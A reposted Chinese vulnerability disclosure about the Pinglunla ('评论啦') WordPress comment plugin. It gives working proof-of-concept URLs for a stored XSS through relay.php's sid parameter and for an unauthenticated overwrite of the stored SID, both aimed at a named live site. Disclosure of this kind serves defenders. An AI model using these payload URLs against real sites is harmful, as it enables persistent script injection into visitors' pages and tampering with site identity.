网站地图    收藏   

主页 > 后端 > 网站安全 >

评论啦Wordpress插件持久XSS及Key远程任意篡改 - 网

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 1.xss/wp-content/plugins/pinglunla/relay.php?sid=ec51555f3e5e125257457a73609bdbe15cb7c29d/scriptscriptalert(0)/scriptscript%20src=以上URL 用于篡改评论啦的SID, 同时注入任意脚本, 脚本会......

1.xss

/wp-content/plugins/pinglunla/relay.php?sid=ec51555f3e5e125257457a73609bdbe15cb7c29d"></script><script>alert(0)</script><script%20src="
 
以上URL 用于篡改评论啦的SID, 同时注入任意脚本, 脚本会被永久保存, 影响所有开启评论功能的页面.
漏洞证明:http://www.alibuybuy.com/wp-content/plugins/pinglunla/relay.php?sid=ec51555f3e5e125257457a73609bdbe15cb7c29d"></script><script>alert(0)</script><script%20src="

2.

通过一个精心构造的URL, 可以任意篡改储存在数据库的SID 值. SID 是评论啦用于识别用户身份的标识.
详细说明: www.2cto.com
/wp-content/plugins/pinglunla/relay.php?sid=new sid here
 
以上URL是用来接收PINGLUNLA服务器的回调, 参数sid会被值"new sid here"替换保存至数据库, 因为没有做任何认证, 匿名用户可以任意调用该接口进而篡改sid.
漏洞证明:

http://www.alibuybuy.com/wp-content/plugins/pinglunla/relay.php?sid=new sid here
修复方案:

除了等待官方修复, 或可临时修改你的文件夹名称, 如wp-content, plinglunla, 以免被猜解.


作者 markstip

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论